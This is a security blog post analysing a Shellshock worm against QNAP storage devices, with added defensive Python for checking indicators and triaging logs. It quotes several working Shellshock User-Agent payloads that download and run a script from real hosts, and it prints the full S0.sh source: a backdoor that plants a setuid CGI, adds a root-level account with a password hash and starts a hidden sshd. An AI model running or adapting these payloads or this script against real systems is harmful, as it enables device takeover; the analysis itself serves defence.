The initial attack consisted of a connection to a web server with a bash exploit embedded in the HTTP header:
URL: "/cgi-bin/authLogin.cgi"
HTTP header included: "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 "
This looks like fun!
It's very clear here what the exploit is trying to do. A CGI web server exports the User-Agent header to the program it runs as an environment variable (HTTP_USER_AGENT). A vulnerable bash parses the leading "() { :; };" as a function definition and then keeps going, executing the commands that follow it: delete any previous copy of the stage-2 script, fetch S0.sh from the distribution point with wget, and run it with /bin/sh. Let's also grab a copy and see what we get.
First though, let's think about safety for a second. We know this is a malicious attack, so we have to assume that there might be some nasty surprises to be found. Here are some of the precautions that I took (you may decide to take others).
- The initial attack appears to be a simple shell script, so it should be safe to download and view. Despite that, I spun up a VM with no sensitive data or access, to work on this. Probably overly paranoid, but don't forget that /bin/less was recently compromised.
- In the spirit of being paranoid, I decided not to expose an IP address I care about to the attacker. If the attacker wants to, he/she might be able to determine from their logs when non-infected machines connect to their server. No point in giving them a more interesting target to attack.
- If I were to get to the point of executing malicious code (which, in this case, I didn't) I would be even more paranoid about building a stand-alone environment.
The good news is that they didn't try to obfuscate the code. In fact, we'll see there are even a few comments left.
Line 3 looks to me like an attempt to cover their tracks a bit, so that there won't be any tell-tale commands floating around in an account's command line history. Note, though, that the variable names are misspelled: bash uses HISTFILE, not HISTFIE, and neither SHISTORY nor BASHISTORY means anything to it, so these unsets would not actually suppress history even if the script were running under bash rather than /bin/sh.
Line 5 is the first really interesting part. Interestingly, this is the same IP that the initial exploit downloaded S0.sh from. In my copy of the exploit, this address resolves to gaspolo.uaservers.net. Doing a quick web search for this hostname brings up a record on a blacklist site where somebody complained three days ago about "hacking" from that site. It's nice to see that I'm not alone. :-)
S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands.
On line 10 they start making decisions based on the architecture of the machine running S0.sh. Lines 10-90 handle downloading the new programs and setting up the environment for them to run in on ARM; lines 91-176 handle i686 (32-bit Intel), and lines 177-226 are for 64-bit Intel (x86_64). Although the sections differ in some details, they do essentially the same things:
- They download two files, and install them on the machine
- They set up a script "autorun" to run those two files.
- For the ARM and 686 architectures, they install a package manager (the "Itsy" package manager)
- They start sshd on port 26 (e.g. see line 168). Note that the config path on those lines is misspelled ("sshd_confg", not the sshd_config they copied into place a few lines earlier), so unless a file by that name happens to exist, sshd will refuse to start. The ARM autorun entry on line 36 is also broken: "/opt/etc/openssh/sshd_config /etc/ssh/sshd_config" has no cp in front of it, so the && chain stops there.
- They add an account named "request" (on line 233). Its passwd entry has uid 0 and gid 0, so this is a second root-equivalent login with a known password, not just an ordinary user. Lines 239-243 are apparently meant to add it to the administrators group as well, but the modified administrators line is written to /tmp/g while the rest of the file goes to ./g, and only ./g is moved over /etc/group, so the administrators line is actually dropped from the file.
- I'm running John against the password hash. But I don't have a 31337 password cracking rig so I don't expect much. :-)
- They install QNAP's own ShellshockFix package against the ShellShock bug (see line 246), closing the door they came in through.
- The ipkg package manager is not needed for that patch, which is downloaded and run directly (lines 246-248); its visible use is to install openssh (lines 77 and 163), which provides the sshd started on port 26.
- They download a program named "run" to a hidden directory (one literally named "...") and then run it (lines 252, 263). The check on line 254 is meant to skip the download if it's already there, but it applies -f (regular file) to a directory path, so it is always true and the download always happens.
- A comment (line 250) implies this is the scanner
- They reboot the machine
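The list above doubles as a checklist for anyone who administers one of these devices. What follows is an added example for this write-up, not code from the original post, from the worm, or from QNAP: it looks for those artifacts in a copy of a device's files, for instance a disk image mounted read-only under some directory, so nothing from the suspect box has to be executed. The paths and strings are taken from the S0.sh listing; the sample trees are constructed, and the assumptions that "admin" (or "root") is the only legitimate uid-0 account and that the config partition was mounted at tmp/config below the image root, as the script itself does, are mine.

```python
"""Look for the artifacts S0.sh leaves on a QNAP device.

Added example: not part of the original write-up and not code from the worm
or from QNAP. Paths and strings come from the S0.sh listing (lines 9, 23-37,
82, 233-243, 251-263); everything else is an assumption. It runs against a
copy of the device's files, e.g. a disk image mounted read-only under ROOT.
"""
import os

# Files the script drops (fold=/share/MD0_DATA/optware/.xpl/ plus the CGI copy).
DROPPED_FILES = [
    "home/httpd/cgi-bin/exo.cgi",
    "share/MD0_DATA/optware/.xpl/.cgi",
    "share/MD0_DATA/optware/.xpl/.exo.cgi",
    "share/MD0_DATA/optware/.xpl/..32",
    "share/MD0_DATA/optware/.xpl/..64",
    "share/MD0_DATA/optware/.xpl/run",
    "share/HDB_DATA/.../run",
]
# Substrings the script appends to autorun.sh on the config partition.
AUTORUN_MARKERS = ["/optware/.xpl/", "exo.cgi", "sshd -f /etc/ssh/sshd_confg -p 26"]
# Assumption: the analyst mounted the config partition here, as the script does.
AUTORUN_PATH = "tmp/config/autorun.sh"
PASSWD_FILES = ["etc/passwd", "etc/config/passwd"]
GROUP_FILES = ["etc/group", "etc/config/group"]
# Assumption: "admin" is the stock uid-0 account on QNAP; "root" is allowed too
# so the same check is usable on other embedded Linux boxes.
LEGIT_ROOT_ACCOUNTS = {"admin", "root"}

def load_tree(root):
    """Read the files of interest below ROOT into a {relative path: text} map."""
    tree = {}
    for rel in DROPPED_FILES + PASSWD_FILES + GROUP_FILES + [AUTORUN_PATH]:
        path = os.path.join(root, rel)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                tree[rel] = fh.read()
    return tree

def find_indicators(tree):
    """Return human-readable findings for a {relative path: text} map."""
    findings = []
    for rel in DROPPED_FILES:
        if rel in tree:
            findings.append(f"dropped file present: /{rel}")
    # Line 233 adds request:x:0:0:... -> any extra uid-0 account is a finding.
    for rel in PASSWD_FILES:
        for line in tree.get(rel, "").splitlines():
            fields = line.split(":")
            if len(fields) >= 4 and fields[2] == "0" and fields[0] not in LEGIT_ROOT_ACCOUNTS:
                findings.append(f"uid-0 account {fields[0]!r} in /{rel}")
    # Lines 239-243 try to add "request" to administrators, but the edited line
    # goes to /tmp/g and only ./g is moved back, so the group line is lost.
    # Flag both the intended and the actual outcome.
    for rel in GROUP_FILES:
        if rel not in tree:
            continue
        admin_lines = [ln for ln in tree[rel].splitlines() if ln.startswith("administrators:")]
        if not admin_lines:
            findings.append(f"administrators group missing from /{rel}")
        for ln in admin_lines:
            members = ln.split(":")[3].split(",") if ln.count(":") >= 3 else []
            extra = [m for m in members if m and m not in LEGIT_ROOT_ACCOUNTS]
            if extra:
                findings.append(f"unexpected administrators in /{rel}: {','.join(extra)}")
    # Lines 30-37 / 107-110 / 189-191 make autorun.sh relaunch the implant at boot.
    for ln in tree.get(AUTORUN_PATH, "").splitlines():
        if any(marker in ln for marker in AUTORUN_MARKERS):
            findings.append(f"suspicious autorun.sh entry: {ln.strip()}")
    return findings

def is_compromised(tree):
    return bool(find_indicators(tree))

# Constructed sample trees: what the script leaves behind vs. a clean device.
SAMPLE_INFECTED = {
    "home/httpd/cgi-bin/exo.cgi": "\x7fELF...",        # placeholder content
    "share/MD0_DATA/optware/.xpl/run": "#!/bin/sh\n",  # placeholder content
    "etc/passwd": "admin:x:0:0:administrator:/share/homes/admin:/bin/sh\n"
                  "request:x:0:0:request:/share/homes/admin:/bin/sh\n"
                  "guest:x:65534:65534:guest:/tmp:/bin/sh\n",
    "etc/group": "everyone:x:100:\n",  # administrators line lost, see above
    "tmp/config/autorun.sh": "/share/MD0_DATA/optware/.xpl/.cgi\n"
                             "cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi\n",
}
SAMPLE_CLEAN = {
    "etc/passwd": "admin:x:0:0:administrator:/share/homes/admin:/bin/sh\n",
    "etc/group": "administrators:x:0:admin\n",
}

if __name__ == "__main__":
    import sys
    tree = load_tree(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_INFECTED
    for finding in find_indicators(tree) or ["no indicators found"]:
        print(finding)
```

Run it as `python3 check_s0.py /mnt/image` against a mounted copy; with no argument it reports on the constructed infected tree. Working from a mounted image rather than a live shell on the NAS matters here because the script replaces /opt with a symlink and drops a setuid CGI, so binaries on the box itself are not to be trusted.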
Unfortunately, my analysis of this script is limited and ends here. By the time I got around to trying to analyze this script, the server which provides the downloaded files was no longer responding. Either the load of serving these files to all the infected machines has overwhelmed it, it's being subjected to a DoS attack, or it's been taken down. Given that my download attempts timed out, rather than getting a "file not found" or a RST, I tend to favor the first two theories. In any event, I was unable to grab a copy of the other files from this server.
Note BTW the comment on line 6, which hints at another possible site to get this software. Do Not Just Blindly Go There! Attempts to collect the files from there just produce an attempt by that site to redirect you to a known malicious site, bodisparking.com.
Based on the patch which is installed, it's clear that this worm is trying to compromise QNAP devices (qnap.com ). QNAP is a provider of network storage devices, including devices intended for home or small business use. While it seems likely that compromised QNAP devices are being used to scan for more victims (the reference to scan on line 250), it remains unclear what additional use the attackers make of compromised machines.
Update 12/21/2014: So the line of reasoning above turns out to be completely wrong. Based on a suggestion, I dug deeper and was surprised to discover that only one of the many Internet facing servers actually listens on port 8080, so it's the only one which is seeing this probe. Sometimes, the explanation to something is *way* simpler than you expect. :-)
So that's it. The investigation accomplished my primary objective, which was to assess the risk of this attack to the machine being attacked. I can safely say that the machine being attacked by this worm is not at risk.
My secondary goal was to understand why the machine was being attacked, and to learn something about the methods and intentions of the attackers. In that goal I was less successful, primarily because I did not succeed in obtaining and analyzing the complete attack package. But I still learned a lot, and had a lot of fun!
I also learned a good lesson ... when something like this comes along, you need to jump on it quickly. The infrastructure associated with an attack is ephemeral, and if you're not prepared ahead of time, and don't investigate it quickly, you may lose your chance. Build that spare VM now! And think through ahead of time what you're going to do when something like this comes along!
Here's the actual code in S0.sh, which is the code that would be executed if the initial ShellShock attack had succeeded. The only change I've made is to add line numbers.
1: #!/bin/sh
2: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
3: unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
4: os=`uname -m`
5: ip=185.14.30.79
6: #wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
7: #
8: #
9: fold=/share/MD0_DATA/optware/.xpl/
10: if [[ "$os" == 'armv5tel' ]]; then
11: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
12: mkdir -p /share/MD0_DATA/optware/
13: mkdir -p /share/MD0_DATA/optware/.xpl/
14: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
15: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
16: wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
17:
18: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
19: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/.cgi
20: busybox wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
21: wget -c -P /home/httpd/cgi-bin/ http://$ip/armgH.cgi
22: busybox wget -c -P /home/httpd/cgi-bin/ http://$ip/armgH.cgi
23: chmod +x ${fold}.cgi
24: chmod 4755 /home/httpd/cgi-bin/armgH.cgi
25: mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
26: cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
27: sleep 1
28: mount -t ext2 /dev/mtdblock5 /tmp/config
29: sleep 2
30: echo "/share/MD0_DATA/optware/.xpl/.cgi" >> /tmp/config/autorun.sh
31: echo " " >> /tmp/config/autorun.sh
32: echo "cp /share/MD0_DATA/optware/.xpl/.exo.cgi /home/httpd/cgi-bin/exo.cgi" >> /tmp/config/autorun.sh
33: sort -u /tmp/config/autorun.sh >> /tmp/a
34: mv /tmp/a /tmp/config/autorun.sh
35: chmod +x /tmp/config/autorun.sh
36: echo "sleep 30 && cp -f /opt/sbin/sshd /usr/sbin/sshd && /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 & " >> /tmp/config/autorun.sh
37: echo "sleep 200 && sh `echo ${fold}run` &" >> /tmp/config/autorun.sh
38: echo 'cp /etc/resolv.conf /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
39: echo 'cp /etc/hostname /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
40: echo 'cp /etc/TZ /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
41: echo 'cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
42: echo 'rm -rf /opt' >> /tmp/config/autorun.sh
43: echo 'ln -sf /share/MD0_DATA/optware/opt /opt' >> /tmp/config/autorun.sh
44: echo '' >> /tmp/config/autorun.sh
45: echo 'mount -o bind /dev /share/MD0_DATA/optware/dev' >> /tmp/config/autorun.sh
46: echo 'mount -o bind /proc /share/MD0_DATA/optware/proc' >> /tmp/config/autorun.sh
47: echo 'mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb' >> /tmp/config/autorun.sh
48: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia' >> /tmp/config/autorun.sh
49: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload' >> /tmp/config/autorun.sh
50: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb' >> /tmp/config/autorun.sh
51: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb' >> /tmp/config/autorun.sh
52: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public' >> /tmp/config/autorun.sh
53: echo '# adding Ipkg apps into system path ...' >> /tmp/config/autorun.sh
54:
55: echo "export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin " >> /tmp/config/autorun.sh
56:
57: cp -af /share/MD0_DATA/optware/Optware-ipkg.sh /share/MD0_DATA/optware.foo/Optware-ipkg.sh
58: mkdir -p /share/MD0_DATA/optware/opt
59: mkdir /share/MD0_DATA/optware/ipkglib
60: cd /
61: cp -fr /opt/* /share/MD0_DATA/optware/opt/
62: ln -sf /share/MD0_DATA/optware/ipkglib /usr/lib/ipkg
63: ln -sf /share/HDA_DATA/optware/ipkglib /usr/lib/ipkg
64: rm -rf /opt
65: ln -sf /share/MD0_DATA/optware/opt /opt
66: cd /share/MD0_DATA/optware/opt
67: wget -c http://ipkg.nslu2-linux.org/feeds/optware/cs05q3armel/cross/unstable/ipkg-opt_0.99.163-10_arm.ipk
68: tar -xOvzf ipkg-opt_*_arm.ipk ./data.tar.gz | tar -C / -xzvf -
69: echo 'src cs05q3armel http://ipkg.nslu2-linux.org/feeds/optware/cs05q3armel/cross/stable' >> /opt/etc/ipkg.conf
70: /opt/bin/ipkg update
71: cd /share/MD0_DATA/optware
72: /opt/bin/ipkg update
73: echo '#!/bin/sh' >> /usr/bin/ipkg
74: echo 'echo "${$1}lling"'>> /usr/bin/ipkg
75: echo '/opt/bin/ipkg install $2 --tmp-dir=/share/MD0_DATA/ '>> /usr/bin/ipkg
76: chmod 777 /usr/bin/ipkg
77: ipkg install openssh
78: sleep 1
79: cp -f /opt/sbin/sshd /usr/sbin/sshd
80: cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config
81: sleep 2
82: /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26
83: cd /
84: umount /tmp/config
85:
86: rm -fr /mnt/update /mnt/HDA_ROOT/update
87: umount /mnt/update
88:
89: sleep 1
90: rm -fr /mnt/update
91: elif [[ "$os" == 'i686' ]]; then
92: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
93: mkdir -p /share/MD0_DATA/optware/ $fold
94:
95:
96: wget -c -P $fold http://$ip/..32
97: wget -c -P $fold http://$ip/gH.cgi
98:
99: busybox wget -c -P $fold http://$ip/..32
100: busybox wget -c -P $fold http://$ip/gH.cgi
101: chmod 4755 ${fold}gH.cgi
102: chmod 777 ${fold}..32
103: mv ${fold}gH.cgi ${fold}.exo.cgi
104: cp -fr ${fold}.exo.cgi /home/httpd/cgi-bin/exo.cgi
105:
106: mount /dev/sdx6 /tmp/config
107: echo "`echo ${fold}`..32" >> /tmp/config/autorun.sh
108: sort -u /tmp/config/autorun.sh >> /tmp/a
109: mv /tmp/a /tmp/config/autorun.sh
110: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
111: chmod 777 /tmp/config/autorun.sh
112: cd /
113:
114:
115: umount /tmp/config
116: PUF=`ls -a /dev/s* | grep -v 1 | grep 6 `
117: echo $PUF >> /tmp/az1
118: for LINE in `cat /tmp/az1`; do PAte=`echo $LINE `; /bin/mount -t ext2 $PAte /tmp/config ; /bin/sleep 1 ; done
119: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
120: echo "`echo ${fold}`..32" >> /tmp/config/autorun.sh
121: cat /tmp/config/autorun.sh | sort -u >> /tmp/a
122: mv /tmp/a /tmp/config/autorun.sh
123: cat /tmp/config/autorun.sh | grep -v exo >> /tmp/o
124: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/o
125: mv /tmp/o /tmp/config/autorun.sh
126: chmod +x /tmp/config/autorun.sh
127: echo 'cp /etc/resolv.conf /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
128: echo 'cp /etc/hostname /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
129: echo 'cp /etc/TZ /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
130: echo 'cp /etc/config/passwd /etc/config/group /etc/config/shadow /share/MD0_DATA/optware/etc' >> /tmp/config/autorun.sh
131: echo 'rm -rf /opt' >> /tmp/config/autorun.sh
132: echo 'sleep 2' >> /tmp/config/autorun.sh
133: echo 'ln -sf /share/MD0_DATA/optware/opt /opt' >> /tmp/config/autorun.sh
134: echo '' >> /tmp/config/autorun.sh
135: echo 'mount -o bind /dev /share/MD0_DATA/optware/dev' >> /tmp/config/autorun.sh
136: echo 'mount -o bind /proc /share/MD0_DATA/optware/proc' >> /tmp/config/autorun.sh
137: echo 'mount -o bind /proc/bus/usb /share/MD0_DATA/optware/proc/bus/usb' >> /tmp/config/autorun.sh
138: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qmultimedia' >> /tmp/config/autorun.sh
139: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qdownload' >> /tmp/config/autorun.sh
140: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qusb' >> /tmp/config/autorun.sh
141: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Qweb' >> /tmp/config/autorun.sh
142: echo 'mount -o bind /share/MD0_DATA/Qmultimedia /share/MD0_DATA/optware/mnt/ext/Public' >> /tmp/config/autorun.sh
143: echo '# adding Ipkg apps into system path ...' >> /tmp/config/autorun.sh
144: echo "export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin:/usr/bin/X11:/usr/local/sbin " >> /tmp/config/autorun.sh
145:
146: mkdir -p /share/MD0_DATA/optware/opt
147: mkdir /share/MD0_DATA/optware/ipkglib
148: cd /
149: cp -fr /opt/* /share/MD0_DATA/optware/opt/
150: ln -sf /share/MD0_DATA/optware/ipkglib /usr/lib/ipkg
151: rm -rf /opt
152: ln -sf /share/MD0_DATA/optware/opt /opt
153: cd /share/MD0_DATA/optware/opt
154: wget -c http://ipkg.nslu2-linux.org/feeds/optware/i686g25/cross/unstable/ipkg-opt_0.99.163-10_i686.ipk
155: tar -xOvzf ipkg-opt_*_i686.ipk ./data.tar.gz | tar -C / -xzvf -
156: echo 'src i686g25 http://ipkg.nslu2-linux.org/feeds/optware/i686g25/cross/unstable/' >> /opt/etc/ipkg.conf
157: /opt/bin/ipkg update
158: cd /share/MD0_DATA/optware
159: echo '#!/bin/sh' >> /usr/bin/ipkg
160: echo 'echo "${$1}lling"'>> /usr/bin/ipkg
161: echo '/opt/bin/ipkg install $2 --tmp-dir=/share/MD0_DATA/ '>> /usr/bin/ipkg
162: chmod 777 /usr/bin/ipkg
163: ipkg install openssh
164: sleep 2
165: cp -f /opt/sbin/sshd /usr/sbin/sshd
166: cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config
167: sleep 1
168: /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26
169: echo "sleep 200 && sh `echo ${fold}run` &" >> /tmp/config/autorun.sh
170: echo "sleep 80 && cp -f /opt/etc/openssh/sshd_config /etc/ssh/sshd_config && cp -f /opt/sbin/sshd /usr/sbin/sshd && /usr/sbin/sshd -f /etc/ssh/sshd_confg -p 26 &" >> /tmp/config/autorun.sh
171: cd /
172: umount /tmp/config
173: sleep 1
174:
175:
176:
177: elif [[ "$os" == 'x86_64' ]]; then
178: echo "nameserver 8.8.8.8" >> /etc/resolv.conf
179: # mkdir -p $fold
180:
181: wget -P $fold http://$ip/..64
182: wget -P $fold http://$ip/64.cgi
183: cp ${fold}64.cgi /home/httpd/cgi-bin/exo.cgi
184: mv ${fold}64.cgi ${fold}.exo.cgi
185: chmod +x ${fold}..64
186: chmod 4755 ${fold}64.cgi
187: mount -t ext2 /dev/sdk6 /tmp/config
188: sleep 2
189: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
190: chmod 777 /tmp/config/autorun.sh
191: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
192: cd /
193: umount /tmp/config
194: rm -fr /tmp/config/autorun.sh
195: mount /dev/sdx6 /tmp/config
196: sleep 2
197: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
198: chmod 777 /tmp/config/autorun.sh
199: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
200: cd /
201: umount /tmp/config
202: rm -fr /tmp/config/autorun.sh
203: mount -t ext2 /dev/sdg6 /tmp/config
204: sleep 2
205: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
206: chmod 777 /tmp/config/autorun.sh
207: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
208: cd /
209: umount /tmp/config
210: rm -fr /tmp/config/autorun.sh
211:
212: PUF=`ls -a /dev/s* | grep -v 1 | grep 6 `
213: echo $PUF >> /tmp/az1
214: for LINE in `cat /tmp/az1`; do PA9=`echo $LINE `; /bin/mount -t ext2 $PA9 /tmp/config ; /bin/sleep 1 ; done
215: /bin/sleep 1
216: export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
217: sort -u /tmp/config/autorun.sh >> /tmp/config/aa
218: /bin/mv /tmp/config/aa /tmp/config/autorun.sh
219: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/config/autorun.sh
220: chmod 777 /tmp/config/autorun.sh
221: echo "`echo ${fold}`..64" >> /tmp/config/autorun.sh
222: cd /
223: cat /tmp/config/autorun.sh | grep -v exo >> /tmp/o
224: echo "cp `echo ${fold}`.exo.cgi /home/httpd/cgi-bin/exo.cgi " >> /tmp/o
225: umount /tmp/config
226: fi
227:
228: Search="request"
229: Files="/etc/passwd"
230: if grep $Search $Files; then
231: echo "$Search user its just added!"
232: else
233: echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
234: echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
235: fi
236:
237:
238: #conf group
239: TETTE=`cat /etc/group | grep administra`
240: printf "$TETTE,request" >> /tmp/g
241: cat /etc/group | grep -v adminis >> g
242: mv g /etc/group
243: chmod 777 /etc/group
244: #inst patch
245:
246: wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
247: chmod +x /mnt/HDA_ROOT/update_pkg/ShellshockFix_1.0.2_20141008_all.bin
248: /mnt/HDA_ROOT/update_pkg/ShellshockFix_1.0.2_20141008_all.bin
249:
250: #inst scan
251: sfolder="/share/HDB_DATA/.../"
252: url69="http://185.14.30.79/run"
253: #t -P
254: if [ ! -f $sfolder ];then
255: mkdir -p $sfolder
256: cd $sfolder
257: wget $url69
258: wget $url69 -P ${fold} -q
259: chmod +x ${sfolder}run ${fold}run
260: #sh run &
261: fi
262: cd $fold
263: sh run &
264:
265: #`echo ${fold}`
266:
267: busybox reboot
268: /bin/reboot
269: /sbin/reboot
270: rm $0
271: rm -fr /tmp/S1.sh /tmp/S2.sh /tmp/az1 /tmp/config/autorun.sh /tmp/o /tmp/S0.sh
272: exit
Here are some references:
As usual, SANS is all over this one. Here's their analysis of what appears to be the same worm:
https://isc.sans.edu/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
The devices being attacked: http://www.qnap.com/
Article about other worms attacking the same devices: http://www.pcworld.com/article/2690932/shellshock-attacks-target-qnaps-network-storage-fireeye-says.html
Another article about other worms attacking the same devices: https://www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html
A couple of explanations of the ShellShock vulnerability:
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
http://en.wikipedia.org/wiki/Shellshock_(software_bug)
The package utility the worm uses: http://en.wikipedia.org/wiki/Ipkg
Info on the malicious site (bodisparking.com) you're sent to if you contact the host in the comment (qupn.byethost5.com) : http://www.enigmasoftware.com/bodisparkingcom-removal/
Don't do it!
Update 12/21/2014: Since the original posting, I have seen several variations of this same attack. They all utilized the same attack vector (URL is "/cgi-bin/authLogin.cgi", the attack is embedded in the "User-Agent" header). While they are different, they are all still trying to run a version of S0.sh described above.
() { :; }; /bin/rm -rf /tmp/S0.php /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://x3q.altervista.org/gH/S0.php -O /tmp/S0.sh && /bin/sh /tmp/S0.sh && sh S0.php 0<&1 2>&1 &
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://qupn.byethost5.com/gH/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://185.14.30.79/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1
When I checked the download server for each of these attacks, it was already either down or not providing these files anymore.
However, as of this writing (12/21/2014 @ 15:10 UTC) the download server for this attack was still responding:
() { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -P /tmp && /bin/sh /tmp/S0.php 0<&1 2>&1
I have no idea how much longer that server will remain up until it's shutdown. (I have sent a notification to the best contact I could find.)
Reviewing the S0.php script from this attack shows that "S0" has evolved, some sections of code have been rewritten, but the ultimate functionality is unchanged.
Finally, here's my favorite one so far:
() { :; }; /bin/rm -rf /tmp/io.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -q -c http://nyo2k2.altervista.org/io.php -P /tmp && /bin/rm /tmp/io.php 0<&1 2>&1
Why my favorite? Compare it to the others ... instead of using /bin/sh to run the attack script, it uses /bin/rm to delete it! This has got to be a bug; perhaps a test version which made it into the wild or perhaps the result of some weird data corruption which is occurring somehow. But the overall result is that this version will not propagate itself.
Fun stuff!
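Both the probe at the top of this post and the variants just listed can be triaged mechanically from web server logs. Here is an added example, not part of the original post and not anything from the worm, that parses combined-format access log lines, picks out User-Agent values carrying the Shellshock function-definition prefix, extracts the download hosts as indicators, and reports what is finally done with the fetched stage-2 file: handed to sh (the probe propagates) or to rm (the nyo2k2 variant, which deletes what it just downloaded). The log lines in the block are constructed; the client IPs are from the documentation ranges, and the payloads and download hosts are copied from the probes quoted above.

```python
"""Triage Shellshock probes in web-server access logs.

Added example for this write-up, not code from the original post or from the
worm. It parses combined-format access log lines, picks out User-Agent values
that carry the Shellshock function-definition prefix, extracts the download
hosts as indicators, and classifies each probe by what it finally does with
the fetched stage-2 file (sh = executed, rm = deleted).
"""
import re
from urllib.parse import urlparse

# A vulnerable bash treated an environment variable whose value started with
# "() {" as a function definition and kept executing whatever followed the
# closing brace (CVE-2014-6271). CGI servers export User-Agent as
# HTTP_USER_AGENT, which is what made this header the delivery vehicle.
SHELLSHOCK_PREFIX = re.compile(r"\(\)\s*\{\s*:;\s*\}\s*;")

# Combined log format: host ident user [time] "request" status size "referer" "agent"
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>.*)"$'
)
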